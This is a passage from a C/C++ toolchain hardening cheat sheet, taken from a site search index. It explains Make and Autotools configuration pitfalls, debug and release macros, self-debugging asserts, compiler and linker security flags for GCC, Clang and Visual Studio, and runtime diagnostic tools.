To demonstrate the first issue, confider your project with the following: configure CFLAGS=\"-Wall -fPIE\" CXXFLAGS=\"-Wall -fPIE\" LDFLAGS=\"-pie\". You will probably find the auto tools ignored your request, which means the command below will not produce expected results. As a work around, you will have to open an m4 scripts, Makefile.in or Makefile.am and fix the configuration.

$ configure CFLAGS=\"-Wall -Wextra -Wconversion -fPIE -Wno-unused-parameter\n    -Wformat=2 -Wformat-security -fstack-protector-all -Wstrict-overflow\"\nLDFLAGS=\"-pie -z,noexecstack -z,noexecheap -z,relro -z,now\"\n

For the second point, you will probably be disappointed to learn Automake does not support the concept of configurations. Its not entirely Autoconf's or Automake's fault - Make and its inability to detect changes is the underlying problem. Specifically, Make only checks modification times of prerequisites and targets, and does not check things like CFLAGS and CXXFLAGS. The net effect is you will not receive expected results when you issue make debug and then make test or make release.

Finally, you will probably be disappointed to learn tools such as Autoconf and Automake miss many security related opportunities and ship insecure out of the box. There are a number of compiler switches and linker flags that improve the defensive posture of a program, but they are not 'on' by default. Tools like Autoconf - which are supposed to handle this situation - often provides setting to serve the lowest of all denominators.

A recent discussion on the Automake mailing list illuminates the issue: Enabling compiler warning flags. Attempts to improve default configurations were met with resistance and no action was taken. The resistance is often of the form, \"<some useful warning> also produces false positives\" or \"<some obscure platform> does not support <established security feature>\". Its noteworthy that David Wheeler, the author of Secure Programming for Linux and Unix HOWTO, was one of the folks trying to improve the posture.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#makefiles","title":"Makefiles","text":"

Make is one of the earliest build tools dating back to the 1970s. Its available on Linux, macOS and Unix, so you will frequently encounter projects using it. Unfortunately, Make has a number of short comings (Recursive Make Considered Harmful and What's Wrong With GNU make?), and can cause some discomfort. Despite issues with Make, ESAPI C++ uses Make primarily for three reasons: first, its omnipresent; second, its easier to manage than the Auto Tools family; and third, libtool was out of the question.

Consider what happens when you: (1) type make debug, and then type make release. Each build would require different CFLAGS due to optimizations and level of debug support. In your makefile, you would extract the relevant target and set CFLAGS and CXXFLAGS similar to below (taken from ESAPI C++ Makefile):

## Makefile\nDEBUG_GOALS = $(filter $(MAKECMDGOALS), debug)\nifneq ($(DEBUG_GOALS),)\n    WANT_DEBUG := 1\n    WANT_TEST := 0\n    WANT_RELEASE := 0\nendif\n\u2026\n\nifeq ($(WANT_DEBUG),1)\n    ESAPI_CFLAGS += -DDEBUG=1 -UNDEBUG -g3 -ggdb -O0\n    ESAPI_CXXFLAGS += -DDEBUG=1 -UNDEBUG -g3 -ggdb -O0\nendif\n\nifeq ($(WANT_RELEASE),1)\n    ESAPI_CFLAGS += -DNDEBUG=1 -UDEBUG -g -O2\n    ESAPI_CXXFLAGS += -DNDEBUG=1 -UDEBUG -g -O2\nendif\n\nifeq ($(WANT_TEST),1)\n    ESAPI_CFLAGS += -DESAPI_NO_ASSERT=1 -g2 -ggdb -O2 -Dprivate=public\n                                                      -Dprotected=public\n    ESAPI_CXXFLAGS += -DESAPI_NO_ASSERT=1 -g2 -ggdb -O2 -Dprivate=public\n                                                        -Dprotected=public\nendif\n\u2026\n\n## Merge ESAPI flags with user supplied flags. We perform the extra step to ensure\n## user options follow our options, which should give user option's a preference.\noverride CFLAGS := $(ESAPI_CFLAGS) $(CFLAGS)\noverride CXXFLAGS := $(ESAPI_CXXFLAGS) $(CXXFLAGS)\noverride LDFLAGS := $(ESAPI_LDFLAGS) $(LDFLAGS)\n\u2026\n

Make will first build the program in a debug configuration for a session under the debugger using a rule similar to:

%.cpp:%.o:\n        $(CXX) $(CPPFLAGS) $(CXXFLAGS) -c $< -o $@\n

When you want the release build, Make will do nothing because it considers everything up to date despite the fact CFLAGS and CXXFLAGS have changed. Hence, your program will actually be in a debug configuration and risk a SIGABRT at runtime because debug instrumentation is present (recall assert calls abort() when NDEBUG is not defined). In essence, you have DoS'd yourself due to make.

In addition, many projects do not honor the user's command-line. ESAPI C++ does its best to ensure a user's flags are honored via override as shown above, but other projects do not. For example, consider a project that should be built with Position Independent Executable (PIE or ASLR) enabled and data execution prevention (DEP) enabled. Dismissing user settings combined with insecure out of the box settings (and not picking them up during auto-setup or auto-configure) means a program built with the following will likely have neither defense:

make CFLAGS=\"-fPIE\" CXXFLAGS=\"-fPIE\" LDFLAGS=\"-pie -z,noexecstack, -z,noexecheap\"\n

Defenses such as ASLR and DEP are especially important on Linux because Data Execution - not Prevention - is the norm.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#integration","title":"Integration","text":"

Project level integration presents opportunities to harden your program or library with domain specific knowledge. For example, if the platform supports Position Independent Executables (PIE or ASLR) and data execution prevention (DEP), then you should integrate with it. The consequences of not doing so could result in exploitation. As a case in point, see KingCope's 0-days for MySQL in December, 2012 (CVE-2012-5579 and CVE-2012-5612, among others). Integration with platform security would have neutered a number of the 0-days.

You also have the opportunity to include helpful libraries that are not need for business logic support. For example, if you are working on a platform with DMalloc or Address Sanitizer, you should probably use it in your debug builds. For Ubuntu, DMalloc available from the package manager and can be installed with sudo apt install libdmalloc5. For Apple platforms, its available as a scheme option. Address Sanitizer is available in GCC 4.8 and above for many platforms.

In addition, project level integration is an opportunity to harden third party libraries you chose to include. Because you chose to include them, you and your users are responsible for them. If you or your users endure a SP800-53 audit, third party libraries will be in scope because the supply chain is included (specifically, item SA-12, Supply Chain Protection). The audits are not limited to those in the US Federal arena - financial institutions perform reviews too. A perfect example of violating this guidance is CVE-2012-1525, which was due to Adobe's inclusion of a defective Sablotron library.

Another example is including OpenSSL. You know (1) SSLv2 is insecure, (2) SSLv3 is insecure, and (3) compression is insecure (among others). In addition, suppose you don't use hardware and engines, and only allow static linking. Given the knowledge and specifications, you would configure the OpenSSL library as follows:

$ Configure darwin64-x86_64-cc -no-hw -no-engine -no-comp -no-shared\n    -no-dso -no-ssl2 -no-ssl3 --openssldir=\u2026\n

Note Well: you might want engines, especially on Ivy Bridge microarchitectures (3rd generation Intel Core i5 and i7 processors). To have OpenSSL use the processor's random number generator (via the of rdrand instruction), you will need to call OpenSSL's ENGINE_load_rdrand() function and then ENGINE_set_default with ENGINE_METHOD_RAND. See OpenSSL's Random Numbers for details.

If you configure without the switches, then you will likely have vulnerable code/libraries and risk failing an audit. If the program is a remote server, then the following command will reveal if compression is active on the channel:

echo \"GET / HTTP1.0\" | openssl s_client -connect <nowiki>example.com:443</nowiki>\n

nm or openssl s_client will show that compression is enabled in the client. In fact, any symbol within the OPENSSL_NO_COMP preprocessor macro will bear witness since -no-comp is translated into a CFLAGS define.

$ nm /usr/local/ssl/iphoneos/lib/libcrypto.a 2>/dev/null | egrep -i \"(COMP_CTX_new|COMP_CTX_free)\"\n0000000000000110 T COMP_CTX_free\n0000000000000000 T COMP_CTX_new\n

Even more egregious is the answer given to auditors who specifically ask about configurations and protocols: \"we don't use weak/wounded/broken ciphers\" or \"we follow best practices.\" The use of compression tells the auditor that you are using wounded protocol in an insecure configuration and you don't follow best practices. That will likely set off alarm bells, and ensure the auditor dives deeper on more items.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#preprocessor","title":"Preprocessor","text":"

The preprocessor is crucial to setting up a project for success. The C committee provided one macro - NDEBUG - and the macro can be used to derive a number of configurations and drive engineering processes. Unfortunately, the committee also left many related items to chance, which has resulted in programmers abusing built-in facilities. This section will help you set up you projects to integrate well with other projects and ensure reliability and security.

There are three topics to discuss when hardening the preprocessor. The first is well defined configurations which produce well defined behaviors, the second is useful behavior from assert, and the third is proper use of macros when integrating vendor code and third party libraries.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#configurations","title":"Configurations","text":"

To remove ambiguity, you should recognize two configurations: Release and Debug. Release is for production code on live servers, and its behavior is requested via the C/C++ NDEBUG macro. Its also the only macro observed by the C and C++ Committees and Posix. Diametrically opposed to release is Debug. While there is a compelling argument for !defined(NDEBUG), you should have an explicit macro for the configuration and that macro should be DEBUG. This is because vendors and outside libraries use DEBUG (or similar) macro for their configuration. For example, Carnegie Mellon's Mach kernel uses DEBUG, Microsoft's CRT uses _DEBUG, and Wind River Workbench uses DEBUG_MODE.

In addition to NDEBUG (Release) and DEBUG (Debug), you have two additional cross products: both are defined or neither are defined. Defining both should be an error, and defining neither should default to a release configuration. Below is from ESAPI C++ EsapiCommon.h, which is the configuration file used by all source files:

// Only one or the other, but not both\n##if (defined(DEBUG) || defined(_DEBUG)) && (defined(NDEBUG)\n|| defined(_NDEBUG))\n## error Both DEBUG and NDEBUG are defined.\n##endif\n\n// The only time we switch to debug is when asked.\n// NDEBUG or {nothing} results\n// in release build (fewer surprises at runtime).\n##if defined(DEBUG) || defined(_DEBUG)\n## define ESAPI_BUILD_DEBUG 1\n##else\n## define ESAPI_BUILD_RELEASE 1\n##endif\n

When DEBUG is in effect, your code should receive full debug instrumentation, including the full force of assertions.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#assert","title":"ASSERT","text":"

Asserts will help you create self-debugging code by helping you find the point of first failure quickly and easily. Asserts should be used throughout your program, including parameter validation, return value checking and program state. The assert will silently guard your code through its lifetime. It will always be there, even when not debugging a specific component of a module. If you have thorough code coverage, you will spend less time debugging and more time developing because programs will debug themselves.

To use asserts effectively, you should assert everything. That includes parameters upon entering a function, return values from function calls, and any program state. Everywhere you place an if statement for validation or checking, you should have an assert. Everywhere you have an assert for validation or checking, you should have an if statement. They go hand-in-hand.

If you are still using printf's, then you have an opportunity for improvement. In the time it takes for you to write a printf or NSLog statement, you could have written an assert. Unlike the printf or NSLog which are often removed when no longer needed, the assert stays active forever. Remember, this is all about finding the point of first failure quickly so you can spend your time doing other things.

There is one problem with using asserts - Posix states assert should call abort() if NDEBUG is not defined. When debugging, NDEBUG will never be defined since you want the \"program diagnostics\" (quote from the Posix description). The behavior makes assert and its accompanying abort() completely useless for development. The result of \"program diagnostics\" calling abort() due to standard C/C++ behavior is disuse - developers simply don't use them. Its incredibly bad for the development community because self-debugging programs can help eradicate so many stability problems.

Since self-debugging programs are so powerful, you will have to have to supply your own assert and signal handler with improved behavior. Your assert will exchange auto-aborting behavior for auto-debugging behavior. The auto-debugging facility will ensure the debugger snaps when a problem is detected, and you will find the point of first failure quickly and easily.

ESAPI C++ supplies its own assert with the behavior described above. In the code below, ASSERT raises SIGTRAP when in effect or it evaluates to void in other cases.

// A debug assert which should be sprinkled liberally.\n// This assert fires and then continues rather\n// than calling abort(). Useful when examining negative\n// test cases from the command-line.\n##if (defined(ESAPI_BUILD_DEBUG) && defined(ESAPI_OS_STARNIX))\n##  define ESAPI_ASSERT1(exp) {                                    \\\n    if(!(exp)) {                                                  \\\n        std::ostringstream oss;                                     \\\n        oss << \"Assertion failed: \" << (char*)(__FILE__) << \"(\"     \\\n            << (int)__LINE__ << \"): \" << (char*)(__func__)          \\\n            << std::endl;                                           \\\n        std::cerr << oss.str();                                     \\\n        raise(SIGTRAP);                                             \\\n    }                                                             \\\n    }\n##  define ESAPI_ASSERT2(exp, msg) {                               \\\n    if(!(exp)) {                                                  \\\n        std::ostringstream oss;                                     \\\n        oss << \"Assertion failed: \" << (char*)(__FILE__) << \"(\"     \\\n            << (int)__LINE__ << \"): \" << (char*)(__func__)          \\\n            << \": \\\"\" << (msg) << \"\\\"\" << std::endl;                \\\n        std::cerr << oss.str();                                     \\\n        raise(SIGTRAP);                                             \\\n    }                                                             \\\n    }\n##elif (defined(ESAPI_BUILD_DEBUG) && defined(ESAPI_OS_WINDOWS))\n##  define ESAPI_ASSERT1(exp)      assert(exp)\n##  define ESAPI_ASSERT2(exp, msg) assert(exp)\n##else\n##  define ESAPI_ASSERT1(exp)      ((void)(exp))\n##  define ESAPI_ASSERT2(exp, msg) ((void)(exp))\n##endif\n\n##if !defined(ASSERT)\n##  define ASSERT(exp)     ESAPI_ASSERT1(exp)\n##endif\n

At program startup, a SIGTRAP handler will be installed if one is not provided by another component:

    struct DebugTrapHandler\n{\nDebugTrapHandler()\n{\nstruct sigaction new_handler, old_handler;\n\ndo\n{\nint ret = 0;\n\nret = sigaction (SIGTRAP, NULL, &old_handler);\nif (ret != 0) break; // Failed\n\n// Don't step on another's handler\nif (old_handler.sa_handler != NULL) break;\n\nnew_handler.sa_handler = &DebugTrapHandler::NullHandler;\nnew_handler.sa_flags = 0;\n\nret = sigemptyset (&new_handler.sa_mask);\nif (ret != 0) break; // Failed\n\nret = sigaction (SIGTRAP, &new_handler, NULL);\nif (ret != 0) break; // Failed\n\n} while(0);\n}\n\nstatic void NullHandler(int /*unused*/) { }\n\n};\n\n// We specify a relatively low priority, to make sure we run before other CTORs\n// http://gcc.gnu.org/onlinedocs/gcc/C_002b_002b-Attributes.html#C_002b_002b-Attributes\nstatic const DebugTrapHandler g_dummyHandler __attribute__ ((init_priority (110)));\n

On a Windows platform, you would call _set_invalid_parameter_handler (and possibly set_unexpected or set_terminate) to install a new handler.

Live hosts running production code should always define NDEBUG (i.e., release configuration), which means they do not assert or auto-abort. Auto-abortion is not acceptable behavior, and anyone who asks for the behavior is completely abusing the functionality of \"program diagnostics\". If a program wants a core dump, then it should create the dump rather than crashing.

For more reading on asserting effectively, please see one of John Robbin's books, such as Debugging Applications. John is a legendary bug slayer in Windows circles, and he will show you how to do nearly everything, from debugging a simple program to bug slaying in multithreaded programs.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#additional-macros","title":"Additional Macros","text":"

Additional macros include any macros needed to integrate properly and securely. It includes integrating the program with the platform (for example MFC or Cocoa/CocoaTouch) and libraries (for example, Crypto++ or OpenSSL). It can be a challenge because you have to have proficiency with your platform and all included libraries and frameworks. The list below illustrates the level of detail you will need when integrating.

Though Boost is missing from the list, it appears to lack recommendations, additional debug diagnostics, and a hardening guide. See BOOST Hardening Guide (Preprocessor Macros) for details. In addition, Tim Day points to [boost.build] should we not define _SECURE_SCL=0 by default for all msvc toolsets for a recent discussion related to hardening (or lack thereof).

In addition to what you should define, defining some macros and undefining others should trigger a security related defect. For example, -U_FORTIFY_SOURCES on Linux and _CRT_SECURE_NO_WARNINGS=1, _SCL_SECURE_NO_WARNINGS, _ATL_SECURE_NO_WARNINGS or STRSAFE_NO_DEPRECATE on Windows.

a) Be careful with _GLIBCXX_DEBUG when using pre-compiled libraries such as Boost from a distribution. There are ABI incompatibilities, and the result will likely be a crash. You will have to compile Boost with _GLIBCXX_DEBUG or omit _GLIBCXX_DEBUG.

b) See Chapter 5, Diagnostics of the libstdc++ manual for details.

c) SQLite secure deletion zeroizes memory on destruction. Define as required, and always define in US Federal since zeroization is required for FIPS 140-2, Level 1.

d) N is 0644 by default, which means everyone has some access.

e) Force temporary tables into memory (no unencrypted data to disk).

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#compiler-and-linker","title":"Compiler and Linker","text":"

Compiler writers provide a rich set of warnings from the analysis of code during compilation. Both GCC and Visual Studio have static analysis capabilities to help find mistakes early in the development process. The built-in static analysis capabilities of GCC and Visual Studio are usually sufficient to ensure proper API usage and catch a number of mistakes such as using an uninitialized variable or comparing a negative signed int and a positive unsigned int.

As a concrete example, (and for those not familiar with C/C++ promotion rules), a warning will be issued if a signed integer is promoted to an unsigned integer and then compared because a side effect is -1 > 1 after promotion! GCC and Visual Studio will not currently catch, for example, SQL injections and other tainted data usage. For that, you will need a tool designed to perform data flow analysis or taint analysis.

Some in the development community resist static analysis or refute its results. For example, when static analysis warned the Linux kernel's sys_prctl was comparing an unsigned value against less than zero, Jesper Juhl offered a patch to clean up the code. Linus Torvalds howled \"No, you don't do this\u2026 GCC is crap\" (referring to compiling with warnings). For the full discussion, see [PATCH] Don't compare unsigned variable for <0 in sys_prctl() from the Linux Kernel mailing list.

The following sections will detail steps for three platforms. First is a typical GNU Linux based distribution offering GCC and Binutils, second is Clang and Xcode, and third is modern Windows platforms.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#distribution-hardening","title":"Distribution Hardening","text":"

Before discussing GCC and Binutils, it would be a good time to point out some of the defenses discussed below are all ready present in a distribution. Unfortunately, its design by committee, so what is present is usually only a mild variation of what is available (this way, everyone is mildly offended). For those who are purely worried about performance, you might be surprised to learn you have already taken the small performance hint without even knowing.

Linux and BSD distributions often apply some hardening without intervention via GCC Spec Files. If you are using Debian, Ubuntu, Linux Mint and family, see Debian Hardening. For Red Hat and Fedora systems, see New hardened build support (coming) in F16. Gentoo users should visit Hardened Gentoo.

You can see the settings being used by a distribution via gcc -dumpspecs. From Linux Mint 12 below, -fstack-protector (but not -fstack-protector-all) is used by default.

$ gcc -dumpspecs\n\u2026\n*link_ssp: %{fstack-protector:}\n\n*ssp_default: %{!fno-stack-protector:%{!fstack-protector-all:\n              %{!ffreestanding:%{!nostdlib:-fstack-protector}}}}\n\u2026\n

The \"SSP\" above stands for Stack Smashing Protector. SSP is a reimplementation of Hiroaki Etoh's work on IBM Pro Police Stack Detector. See Hiroaki Etoh's patch gcc stack-smashing protector and IBM's GCC extension for protecting applications from stack-smashing attacks for details.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#gccbinutils","title":"GCC/Binutils","text":"

GCC (the compiler collection) and Binutils (the assemblers, linkers, and other tools) are separate projects that work together to produce a final executable. Both the compiler and linker offer options to help you write safer and more secure code. The linker will produce code which takes advantage of platform security features offered by the kernel and PaX, such as no-exec stacks and heaps (NX) and Position Independent Executable (PIE).

The table below offers a set of compiler options to build your program. Static analysis warnings help catch mistakes early, while the linker options harden the executable at runtime. In the table below, \"GCC\" should be loosely taken as \"non-ancient distributions.\" While the GCC team considers 4.2 ancient, you will still encounter it on Apple and BSD platforms due to changes in GPL licensing around 2007. Refer to GCC Option Summary, Options to Request or Suppress Warnings and Binutils (LD) Command Line Options for usage details.

Noteworthy of special mention are -fno-strict-overflow and -fwrapv\u2090. The flags ensure the compiler does not remove statements that result in overflow or wrap. If your program only runs correctly using the flags, it is likely violating C/C++ rules on overflow and illegal. If the program is illegal due to overflow or wrap checking, you should consider using safe-iop for C or David LeBlanc's SafeInt in C++.

For a project compiled and linked with hardened settings, some of those settings can be verified with the Checksec tool written by Tobias Klein. The checksec.sh script is designed to test standard Linux OS and PaX security features being used by an application. See the Trapkit web page for details.

GCC C Warning Options table:

a) Unlike Clang and -Weverything, GCC does not provide a switch to truly enable all warnings. b) -fstack-protector guards functions with high risk objects such as C strings, while -fstack-protector-all guards all objects.

Additional C++ warnings which can be used include the following in Table 3. See GCC's Options Controlling C++ Dialect for additional options and details.

GCC C++ Warning Options table:

Effective C++, Second Edition book.

And additional Objective C warnings which are often useful include the following. See Options Controlling Objective-C and Objective-C++ Dialects for additional options and details.

GCC Objective C Warning Options table:

The use of aggressive warnings will produce spurious noise. The noise is a tradeoff - you can learn of potential problems at the cost of wading through some chaff. The following will help reduces spurious noise from the warning system:

Finally, a simple version based Makefile example is shown below. This is different than feature based makefile produced by auto tools (which will test for a particular feature and then define a symbol or configure a template file). Not all platforms use all options and flags. To address the issue you can pursue one of two strategies. First, you can ship with a weakened posture by servicing the lowest common denominator; or you can ship with everything in force. In the latter case, those who don't have a feature available will edit the makefile to accommodate their installation.

CXX=g++\nEGREP = egrep\n\u2026\n\nGCC_COMPILER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^gcc version')\nGCC41_OR_LATER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^gcc version (4\\.[1-9]|[5-9])')\n\u2026\n\nGNU_LD210_OR_LATER = $(shell $(LD) -v 2>&1 | $(EGREP) -i -c '^gnu ld .* (2\\.1[0-9]|2\\.[2-9])')\nGNU_LD214_OR_LATER = $(shell $(LD) -v 2>&1 | $(EGREP) -i -c '^gnu ld .* (2\\.1[4-9]|2\\.[2-9])')\n\u2026\n\nifeq ($(GCC_COMPILER),1)\nMY_CC_FLAGS += -Wall -Wextra -Wconversion\n    MY_CC_FLAGS += -Wformat=2 -Wformat-security\n    MY_CC_FLAGS += -Wno-unused-parameter\nendif\n\nifeq ($(GCC41_OR_LATER),1)\nMY_CC_FLAGS += -fstack-protector-all\nendif\n\nifeq ($(GCC42_OR_LATER),1)\nMY_CC_FLAGS += -Wstrict-overflow\nendif\n\nifeq ($(GCC43_OR_LATER),1)\nMY_CC_FLAGS += -Wtrampolines\nendif\n\nifeq ($(GNU_LD210_OR_LATER),1)\nMY_LD_FLAGS += -z,nodlopen -z,nodump\nendif\n\nifeq ($(GNU_LD214_OR_LATER),1)\nMY_LD_FLAGS += -z,noexecstack -z,noexecheap\nendif\n\nifeq ($(GNU_LD215_OR_LATER),1)\nMY_LD_FLAGS += -z,relro -z,now\nendif\n\nifeq ($(GNU_LD216_OR_LATER),1)\nMY_CC_FLAGS += -fPIE\n    MY_LD_FLAGS += -pie\nendif\n\n## Use 'override' to honor the user's command line\noverride CFLAGS := $(MY_CC_FLAGS) $(CFLAGS)\noverride CXXFLAGS := $(MY_CC_FLAGS) $(CXXFLAGS)\noverride LDFLAGS := $(MY_LD_FLAGS) $(LDFLAGS)\n\u2026\n
"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#clangxcode","title":"Clang/Xcode","text":"

Clang and LLVM have been aggressively developed since Apple lost its GPL compiler back in 2007 (due to Tivoization which resulted in GPLv3). Since that time, a number of developers and Goggle have joined the effort. While Clang will consume most (all?) GCC/Binutil flags and switches, the project supports a number of its own options, including a static analyzer. In addition, Clang is relatively easy to build with additional diagnostics, such as Dr. John Regher and Peng Li's Integer Overflow Checker (IOC).

IOC is incredibly useful, and has found bugs in a number of projects, from the Linux Kernel (include/linux/bitops.h, still unfixed), SQLite, PHP, Firefox (many still unfixed), LLVM, and Python. Future version of Clang (Clang 3.3 and above) will allow you to enable the checks out of the box with -fsanitize=integer and -fsanitize=shift.

Clang options can be found at Clang Compiler User's Manual. Clang does include an option to turn on all warnings - -Weverything. Use it with care but use it regularly since you will get back a lot of noise and issues you missed. For example, add -Weverything for production builds and make non-spurious issues a quality gate. Under Xcode, simply add -Weverything to CFLAGS and CXXFLAGS.

In addition to compiler warnings, both static analysis and additional security checks can be performed. Reading on Clang's static analysis capabilities can be found at Clang Static Analyzer. Figure 1 below shows some of the security checks utilized by Xcode.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#visual-studio","title":"Visual Studio","text":"

Visual Studio offers a convenient Integrated Development Environment (IDE) for managing solutions and their settings. the section called \"Visual Studio Options\" discusses option which should be used with Visual Studio, and the section called \"Project Properties\" demonstrates incorporating those options into a solution's project.

The table below lists the compiler and linker switches which should be used under Visual Studio. Refer to Howard and LeBlanc's Writing Secure Code (Microsoft Press) for a detailed discussion; or Protecting Your Code with Visual C++ Defenses in Security Briefs by Michael Howard. In the table below, \"Visual Studio\" refers to nearly all versions of the development environment, including Visual Studio 5.0 and 6.0.

For a project compiled and linked with hardened settings, those settings can be verified with BinScope. BinScope is a verification tool from Microsoft that analyzes binaries to ensure that they have been built-in compliance with Microsoft's Security Development Lifecycle (SDLC) requirements and recommendations. See the BinScope Binary Analyzer download page for details.

a) See Jon Sturgeon's discussion of the switch at Off By Default Compiler Warnings in Visual C++.

a) When using /GS, there are a number of circumstances which affect the inclusion of a security cookie. For example, the guard is not used if there is no buffer in the stack frame, optimizations are disabled, or the function is declared naked or contains inline assembly.

b) #pragma strict_gs_check(on) should be used sparingly, but is recommend in high risk situations, such as when a source file parses input from the internet.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#warn-suppression","title":"Warn Suppression","text":"

From the tables above, a lot of warnings have been enabled to help detect possible programming mistakes. The potential mistakes are detected via compiler which carries around a lot of contextual information during its code analysis phase. At times, you will receive spurious warnings because the compiler is not that smart. Its understandable and even a good thing (how would you like to be out of a job because a program writes its own programs?). At times you will have to learn how to work with the compiler's warning system to suppress warnings. Notice what was not said: turn off the warnings.

Suppressing warnings placates the compiler for spurious noise so you can get to the issues that matter (you are separating the wheat from the chaff). This section will offer some hints and point out some potential minefields. First is an unused parameter (for example, argc or argv). Suppressing unused parameter warnings is especially helpful for C++ and interface programming, where parameters are often unused. For this warning, simply define an \"UNUSED\" macro and warp the parameter:

##define UNUSED_PARAMETER(x) ((void)x)\n\u2026\n\nint main(int argc, char* argv[])\n{\nUNUSED_PARAMETER(argc);\nUNUSED_PARAMETER(argv);\n\u2026\n}\n

A potential minefield lies near \"comparing unsigned and signed\" values, and -Wconversion will catch it for you. This is because C/C++ promotion rules state the signed value will be promoted to an unsigned value and then compared. That means -1 > 1 after promotion! To fix this, you cannot blindly cast - you must first range test the value:

int x = GetX();\nunsigned int y = GetY();\n\nASSERT(x >= 0);\nif(!(x >= 0))\nthrow runtime_error(\"WTF??? X is negative.\");\n\nif(static_cast<unsigned int>(x) > y)\ncout << \"x is greater than y\" << endl;\nelse\ncout << \"x is not greater than y\" << endl;\n

Notice the code above will debug itself - you don't need to set a breakpoint to see if there is a problem with x. Just run the program and wait for it to tell you there is a problem. If there is a problem, the program will snap the debugger (and more importantly, not call a useless abort() as specified by Posix). It beats the snot out of printf that are removed when no longer needed or pollute outputs.

Another conversion problem you will encounter conversion between types, and -Wconversion will also catch it for you. The following will always have an opportunity to fail, and should light up like a Christmas tree:

struct sockaddr_in addr;\n\u2026\n\naddr.sin_port = htons(atoi(argv[2]));\n

The following would probably serve you much better. Notice atoi and fiends are not used because they can silently fail. In addition, the code is instrumented so you don't need to waste a lot of time debugging potential problems:

const char* cstr = GetPortString();\n\nASSERT(cstr != NULL);\nif(!(cstr != NULL))\nthrow runtime_error(\"WTF??? Port string is not valid.\");\n\nistringstream iss(cstr);\nlong long t = 0;\niss >> t;\n\nASSERT(!(iss.fail()));\nif(iss.fail())\nthrow runtime_error(\"WTF??? Failed to read port.\");\n\n// Should this be a port above the reserved range ([0-1024] on Unix)?\nASSERT(t > 0);\nif(!(t > 0))\nthrow runtime_error(\"WTF??? Port is too small\");\n\nASSERT(t < static_cast<long long>(numeric_limits<unsigned int>::max()));\nif(!(t < static_cast<long long>(numeric_limits<unsigned int>::max())))\nthrow runtime_error(\"WTF??? Port is too large\");\n\n// OK to use port\nunsigned short port = static_cast<unsigned short>(t);\n\u2026\n

Again, notice the code above will debug itself - you don't need to set a breakpoint to see if there is a problem with port. This code will continue checking conditions, years after being instrumented (assuming to wrote code to read a config file early in the project). There's no need to remove the ASSERTs as with printf since they are silent guardians.

Another useful suppression trick is too avoid ignoring return values. Not only is it useful to suppress the warning, its required for correct code. For example, snprint will alert you to truncations through its return value. You should not make them silent truncations by ignoring the warning or casting to void:

char path[PATH_MAX];\n\u2026\n\nint ret = snprintf(path, sizeof(path), \"%s/%s\", GetDirectory(), GetObjectName());\nASSERT(ret != -1);\nASSERT(!(ret >= sizeof(path)));\n\nif(ret == -1 || ret >= sizeof(path))\nthrow runtime_error(\"WTF??? Unable to build full object name\");\n\n// OK to use path\n\u2026\n

The problem is pandemic, and not just boring user land programs. Projects which offer high integrity code, such as SELinux, suffer silent truncations. The following is from an approved SELinux patch even though a comment was made that it suffered silent truncations in its security_compute_create_name function from compute_create.c.

12  int security_compute_create_raw(security_context_t scon,\n13                                  security_context_t tcon,\n14                                  security_class_t   tclass,\n15                                  security_context_t * newcon)\n16  {\n17    char path[PATH_MAX];\n18    char *buf;\n19    size_t size;\n20    int fd, ret;\n21\n22    if (!selinux_mnt) {\n23      errno = ENOENT;\n24      return -1;\n25    }\n26\n27    snprintf(path, sizeof path, \"%s/create\", selinux_mnt);\n28    fd = open(path, O_RDWR);\n

Unlike other examples, the above code will not debug itself, and you will have to set breakpoints and trace calls to determine the point of first failure. (And the code above gambles that the truncated file does not exist or is not under an adversary's control by blindly performing the open).

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#runtime","title":"Runtime","text":"

The previous sections concentrated on setting up your project for success. This section will examine additional hints for running with increased diagnostics and defenses. Not all platforms are created equal - GNU Linux is difficult to impossible to add hardening to a program after compiling and static linking; while Windows allows post-build hardening through a download. Remember, the goal is to find the point of first failure quickly so you can improve the reliability and security of the code.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#xcode","title":"Xcode","text":"

Xcode offers additional Code Diagnostics that can help find memory errors and object use problems. Schemes can be managed through Products menu item, Scheme submenu item, and then Edit. From the editor, navigate to the Diagnostics tab. In the figure below, four additional instruments are enabled for the debugging cycle: Scribble guards, Edge guards, Malloc guards, and Zombies.

There is one caveat with using some of the guards: Apple only provides them for the simulator, and not a device. In the past, the guards were available for both devices and simulators.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#windows","title":"Windows","text":"

Visual Studio offers a number of debugging aides for use during development. The aides are called Managed Debugging Assistants (MDAs). You can find the MDAs on the Debug menu, then Exceptions submenu. MDAs allow you to tune your debugging experience by, for example, filter exceptions for which the debugger should snap. For more details, see Stephen Toub's Let The CLR Find Bugs For You With Managed Debugging Assistants.

Finally, for runtime hardening, Microsoft has a helpful tool called EMET. EMET is the Enhanced Mitigation Experience Toolkit, and allows you to apply runtime hardening to an executable which was built without. Its very useful for utilities and other programs that were built without an SDLC.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html","title":"Choosing and Using Security Questions Cheat Sheet","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#introduction","title":"Introduction","text":"

